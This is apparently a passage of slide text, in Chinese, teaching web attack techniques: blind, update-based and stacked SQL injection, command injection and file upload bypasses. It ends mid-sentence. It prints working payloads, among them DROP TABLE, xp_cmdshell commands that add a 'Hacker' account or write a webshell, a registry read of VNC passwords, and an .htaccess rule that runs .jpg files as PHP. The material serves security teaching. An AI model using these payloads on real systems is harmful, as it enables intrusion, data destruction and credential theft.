小心因检查不确实而被绕过gifphp多重附档名.PPT

Update Based 發生於所有程式、所有資料庫環境下 利用程式更新資料時，插入欲撈取資料之SQL，以在更新後得到資料 儘量不要在注入的SQL後面加上 -- MSSQL 使用 + 結合字串 Oracle 使用 || 結合字串 ‘ + @@version + ‘ ‘ + (select name from master..sysdatabases where dbid=7) +’ ‘,email=(select … ),’ … Why ？？？ 本來的語法長這樣 Update Member Set email=‘[email]’, address=‘[地址]’ Where user=‘[使用者名稱]’ 插入SQL後成為 – Update Member Set email=‘‘ + user + ’’ , address=‘[地址]’ Where user=‘[使用者名稱]’ Blind 發生於所有程式、所有資料庫環境下 頁面沒有任何錯誤訊息供判斷，故稱 “Blind” 利用回應頁面的 “是” 與 “否” 判斷所注入的SQL是否執行成功 id=1 and 1=1 id=1 and 1=2 id=1 and (select top 1 ascii(substring(COLUMN,1,1)) from TABLE)79 Why ？？？ 本來的語法長這樣 Select * From News Where id= [網址參數id] 插入SQL後成為 – Select * From News Where id= 1 and 1=1 (1 and 1=2) 觀察兩次查詢的結果 Stack Query 發生於資料庫為 MSSQL 時 利用 ; 符號中止原查詢語句，注入欲執行之動作 可注入任何 SQL 語句，包含四大資料處理語法（SELECT/INSERT/DELETE/UPDATE）、及延伸程序等 id=1 ; drop table account;-- id=1 ; exec master..xp_cmdshell ‘net user Hacker Hacker /add’;-- 不正常的Query (1) 使用註解符號中斷 SQL 語句 /* -- 永遠成立的條件 or 1=1-- or 21-- ‘ or ‘’=‘ 不正常的Query (2) 測試查詢成功與否 and 1=1-- and 1=2-- ‘;declare @a int;-- 使查詢產生錯誤 進行不同型別的轉換 (字串-整數) @@version1 邏輯運算錯誤 1/0 依不存在的欄位排序 order by 100 不正常的Query (3) 使用union結合兩段query ‘ union select col1,col2,… from table-- 呼叫函數或延伸程序 ;exec master..xp_cmdshell ‘net user Hacker Hacker /add’;-- ;exec master..xp_cmdshell echo WEBSHELL path/a.asp‘-- ;exec master..xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3,Password;-- Command Injection 執行作業系統指令之參數來自使用者端 Example : Execute( “dir ” Request(“dir”) ) 插入指令分隔字元 ; | ` ` Listfile.asp?dir=C:\;net user hacker hacker /add File Upload Mis-Handling 檔案上傳功能 許多AP都有檔案上傳功能 上傳圖片、音樂、文件…. 控管不好的話，駭客可以上傳惡意程式 WebShell ? 控制後端Web 主機 傳小馬、換大馬 * 傳統防護機制 傳統檢查機制許多都有風險 Client-side validation 可被bypass ! MIME Type validation 可被假造! 攻擊者可透過自己寫的Script或是自動化程式，一樣利用HTTP POST方式來上傳檔案，但是自己竄改成假的MIME Type。 * 傳統防護機制(cont.) 某些平台設定本身有漏洞 : Apache + PHP 駭客上傳自己的系統設定檔 “.htaccess”, 內含 : AddType application/x-httpd-php .jpg 可以讓系統用 PHP 的執行方式來處理 .jpg 的檔案 filename.php.123 ?! Apache中遇到不認識的副檔名，會找認識的副